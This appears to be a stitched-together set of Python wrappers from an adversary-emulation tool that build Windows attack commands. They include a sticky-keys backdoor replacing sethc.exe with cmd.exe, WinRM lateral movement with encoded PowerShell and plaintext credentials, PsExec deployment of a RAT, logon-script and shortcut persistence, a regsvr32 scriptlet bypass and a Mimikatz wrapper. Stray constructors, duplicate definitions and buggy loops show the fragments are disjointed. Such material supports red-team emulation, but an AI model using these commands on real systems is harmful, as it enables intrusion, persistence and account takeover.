def accessFeatA(key_id: int) -> Tuple [CommandLine, Callable[[str], None]]:
command_line = "cmd.exe /C \"takeown /f C:\\Windows\\System32\\sethc.exe && icacls " \
"C:\\Windows\\System32\\sethc.exe /grant administrators:f " \
"&& move C:\\Windows\\System32\\sethc.exe " \
"C:\\Windows\\System32\\sethc.exe." + str(key_id) + " && copy C:\\Windows\\System32\\cmd.exe " \
"C:\\Windows\\System32\\sethc.exe\""
return CommandLine(command_line), parsers.static.accessFeat
def dir_list(search: Union[str, list], b: bool, s: bool,
a: str) -> Tuple[CommandLine, Callable[[str], None]]:
"""
dir_list is the "dir" command that lists the files/folders in a directory
Args:
search: what to list, can either be a single full path (str) or can be a list of things to search for
within the current working directory (list)
b: bool on if we should include the /b flag in the query (bare info, just filename)
s: bool on if we should include the /s flag in the query (recursive)
a: potential arguments to include with the /a flag if a is not None
Returns:
The CommandLine and a parser for the output of the command
"""
args = ["cmd /c dir"]
if isinstance(search, str):
args.append("\"" + search +
"\"") # this is the instance where you do dir C:\
else:
for word in list:
args.append(
"*" + word +
"*") # this is the instance where you do dir *test* *files*
if b:
args.append('/b')
if s:
args.append('/s')
if a is not None:
args.append('/a' + a)
# outputs of these different switches is radically different, so need different parsers for the different versions
if b and s:
return CommandLine(args), parsers.cmd.dir_collect
else:
raise errors.ParserNotImplementedError
def __init__(self, function_name: str, *args: PSArg) -> None:
self.command = [function_name]
for arg in args:
self.command.append(arg.text)
self.command = CommandLine(self.command)
def files() -> Tuple[CommandLine, Callable[[str], None]]:
command = 'powershell -command "&{$filetype = @(\\"*.docx\\",\\"*.pdf\\",\\"*.xlsx\\"); $startdir = ' \
'\\"c:\\\\Users\\\\\\"; for($k=0;$k -lt $filetype.length; $k++){ $core = dir $startdir\($filetype[$k]) ' \
'-Recurse | Select @{Name=\\"Path\\";Expression={$_.Fullname -as [string]}}; foreach ($alpha in $core) ' \
'{$filename = $alpha.Path -as [string]; [Byte[]] $corrupt_file = [System.IO.File]::ReadAllBytes(' \
'$filename); [Byte[]] $key_file = [System.IO.File]::ReadAllBytes($(' \
'-join($filename, \\".old\\"))); for($i=0; $i -lt $key_file.Length; $i++) { $corrupt_file[$i] = ' \
'$key_file[$i];} [System.IO.File]::WriteAllBytes($(resolve-path $filename), $corrupt_file); ' \
'Remove-Item $(-join($filename,\\".old\\"))}}}"'
return CommandLine(
'cmd /c {}'.format(command)), parsers.footprint.recover_files
def delete(path: str) -> Tuple[CommandLine, Callable[[str], None]]:
"""
delete is the "del" command that deletes a file
Args:
path: the path of the file to be deleted
Returns:
The CommandLine and a parser for the output of the command
"""
args = ['cmd /c del', "\"" + path + "\""]
return CommandLine(args), parsers.cmd.delete
def runas(user: str, program: str, args: List[str] = None) -> CommandLine:
"""
The net command is one of Windows' many swiss army knives.
:type context: ExecutionContext
:param args: Additional command line arguments to net.exe
:return:
"""
command_line = ['runas.exe']
if args:
command_line += args
return CommandLine(command_line)
def copy(src_file_path: str,
dst_file_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
"""
Copies a file using the copy command built in to cmd.exe
Args:
src_file_path: The source path of the file that will be copied
dst_file_path: The destination path of the file that will be copied
Returns:
The CommandLine and a parser for the output of the command
"""
return CommandLine('cmd /c copy \"{}\" \"{}\"'.format(
src_file_path, dst_file_path)), parsers.cmd.copy
def wmic(args: List[str]=None) -> CommandLine:
"""Wrapper for the windows tool wmic.exe
Args:
args: The additional arguments for the command line
Returns:
The CommandLine
"""
command_line = ["wmic"]
if args is not None:
command_line += args
return CommandLine(command_line)
def xcopy(args: List[str], overwrite_destination: bool) -> CommandLine:
"""Copies files and directories, including subdirectories.
Ref: https://technet.microsoft.com/en-us/library/bb491035.aspx
Args:
args: Additional command line arguments to xcopy.exe
overwrite_destination: True means overwrite the destination if it already exists.
Returns:
The CommandLine
"""
if overwrite_destination:
args.append('/y')
return CommandLine(args)
def tasklist(args: List[str]=None) -> CommandLine:
"""Commandline wrapper for the windows tasklist command.
Args:
args: Additional command line arguments
Returns:
The CommandLine
"""
command_line = ['tasklist']
if args:
command_line += args
return CommandLine(command_line)
def net(args: List[str]=None) -> CommandLine:
"""
The net command is one of Windows' many swiss army knives.
Args:
args: Additional command line arguments to net.exe
Returns:
The CommandLine
"""
command_line = ['net']
if args:
command_line += args
return CommandLine(command_line)
def powershell(
command: str,
parser=parsers.cmd.powershell_file
) -> Tuple[CommandLine, Callable[[str], None]]:
"""
Runs a Powershell query through the Windows command prompt.
Args:
command: the PowerShell command to run. Remmeber that you can separate multiple PowerShell commands with ;
Returns:
The CommandLine and a parser for the output of the command
"""
ps_command = "powershell -ExecutionPolicy Bypass -WindowStyle Minimized -Command " + command
return CommandLine('cmd /c \"{}\""'.format(ps_command)), parser
def at(remote_host: str = None, args: List[str] = None) -> CommandLine:
"""
The net command is one of Windows' many swiss army knives.
Args:
remote_host: The host that is the target of the at command
args: Additional command line arguments to net.exe
"""
command_line = ['at']
if remote_host:
args.append('\\' + remote_host)
if args:
command_line += args
return CommandLine(command_line)
def makecab(path: str = None, args: List[str] = None) -> CommandLine:
"""
Makes a cabinet file
Args:
path: path to the cabinet file
args: Additional command line arguments to net.exe
"""
command_line = ['makecab']
command_line += " " + path
if args:
command_line += args
return CommandLine(command_line)
def sc(args: List[str] = None, remote_host: str = None) -> CommandLine:
"""
Wrapper for the windows tool sc.exe
Args:
args: The additional arguments for the command line
remote_host: Optional - run on a remote host via RPC.
Returns:
The CommandLine
"""
command_line = ["sc.exe"]
if remote_host is not None:
command_line.append('\\\\' + remote_host)
if args is not None:
command_line += args
return CommandLine(command_line)
def shutdown(reboot: bool, delay: int,
force: bool) -> Tuple[CommandLine, Callable[[str], None]]:
"""
Issues the command to shutdown the current computer, possibly for reboot
Args:
reboot: boolean if the shutdown should reboot
delay: how long the computer should wait until starting to shutdown
force: boolean if the computer should force close all open programs or prompt user for input
Returns:
The CommandLine and a parser for the output of the command
"""
args = ['shutdown', '/t', str(delay)]
if reboot:
args.append('/r')
if force:
args.append('/f')
command = ' '.join(args)
return CommandLine('cmd /c {}'.format(command)), parsers.shutdown.shutdown
def move(
src_file_path: str, dst_file_path: str,
suppress_overwrite: bool) -> Tuple[CommandLine, Callable[[str], None]]:
"""
move is the "move" command that moves a file
Args:
src_file_path: path of current file
dst_file_path: path where the new file will be
suppress_overwrite: bool to overwrite a file if it already exists
Returns:
The CommandLine and a parser for the output of the command
"""
args = ['move']
if suppress_overwrite:
args.append('/Y')
command = ' '.join(args)
return CommandLine('cmd /c {} \"{}\" \"{}\"'.format(
command, src_file_path, dst_file_path)), parsers.cmd.move
def lateral_movement(
ip: str, password: str, domain: str, user: str,
file_loc: str) -> Tuple[CommandLine, Callable[[str], None]]:
com = base64.b64encode(
bytes(
"Invoke-WmiMethod -path win32_process -name create -argumentlist '"
+ file_loc + "'", 'UTF-16LE')).decode("UTF-8")
command_line = [
'powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive',
'-NoProfile', '-Command',
'"Set-Item WSMan:localhost\\client\\trustedhosts -value ' + ip +
'-Concatenate -Force;',
'$pw = convertto-securestring -AsPlainText -Force -String ' +
password + ';',
'$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist '
+ domain + "\\" + user + ',$pw;',
'invoke-command -computerName ' + ip + ' -credential $cred '
'-scriptblock {' +
'powershell.exe -ExecutionPolicy Bypass -EncodedCommand ' + com + ' }"'
]
return CommandLine(command_line), parsers.winrm.lateral_movement
def reg(remote_host: str = None, args: List[str] = None) -> CommandLine:
"""
The reg command is used to query and modify the Windows registry.
Args:
remote_host: The host that is the target of the reg operation
args: Additional command line arguments to reg.exe
Returns:
The CommandLine
"""
command_line = ['reg']
if remote_host is not None:
command_line += "\\\\{}".format(remote_host)
if args:
command_line += args
return CommandLine(command_line)
def copy(ps_file_path: str, rat_file_path: str, user_domain: str, username: str, password: str, target: str,
elevated: bool = True) -> Tuple[CommandLine, Callable[[str], None]]:
"""Builds a commandline for PsExec to copy and execute a file remotely
Args:
ps_file_path: The path to the psexec binary
rat_file_path: The path to the ratremote computer
username: The username remote share
user_domain: The (Windows) domain of the user account
password: (Optional) The password to be used
target: The target host to run the file on
elevated: Allows the created process to be run in an elevated context
Returns:
The CommandLine and a parser
"""
args = [ps_file_path, "-accepteula",
"-u", user_domain + "\\" + username,
"-p", password,
"-h" if elevated else '',
"-d", "-cv",
rat_file_path, "\\\\" + target]
return CommandLine(args), parsers.psexec.copy
def bypassB() -> Tuple [CommandLine, Callable[[str], None]]:
command_line = ['powershell', '-executionPolicy', 'Bypass', '-file', "C:\\bypassB.ps1"]
return CommandLine(command_line), parsers.static.bypassB
def netstat(args: List[str] = None) -> CommandLine:
command_line = ['netstat']
if args:
command_line += args
return CommandLine(command_line)
def regsvr32() -> Tuple[CommandLine, Callable[[str], None]]:
command_line = ['regsvr32', '/s /u /i:C://Example.sct scrobj.dll']
return CommandLine(command_line), parsers.test.regsvr32
def logonScriptB() -> Tuple [CommandLine, Callable[[str], None]]:
command_line = ['reg', 'add', 'HKCU\\Environment', '/v', 'UserInitMprLogonScript', '/t', 'REG_SZ', '/d',
'C:\\totally_innocent_executable.exe', '/f']
return CommandLine(command_line), parsers.static.logonScript
def shortcutmodify(target_path: str, rat_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
command_line = ['powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command',
'"$SHORTCUT=\'' + target_path + '\';$TARGET=\'' + rat_path + '\';$ws = New-Object -ComObject ' +
'WScript.Shell; $s = $ws.CreateShortcut($SHORTCUT); $S.TargetPath = $TARGET; $S.Save()"']
return CommandLine(command_line), parsers.static.shortcutmodify
def cleanupCMD(CleanCmd: str) -> Tuple [CommandLine, Callable[[str], None]]:
command_line = [CleanCmd]
return CommandLine(command_line), parsers.static.cleanup
def password(user: str,
password: str) -> Tuple[CommandLine, Callable[[str], None]]:
command = 'net user ' + user + ' ' + password
return CommandLine('cmd /c {}'.format(command)), parsers.footprint.password
def logonScriptA() -> Tuple [CommandLine, Callable[[str], None]]:
command_line = ['reg', 'export', 'HKCU\\Environment', 'C:\\envn.reg']
return CommandLine(command_line), parsers.static.logonScript
def __init__(self, *args: MimikatzSubcommand) -> None:
if '\\' in args[0].text:
self.command = CommandLine(['cls'] + [x.text for x in args])
else:
self.command = CommandLine([x.text for x in args])
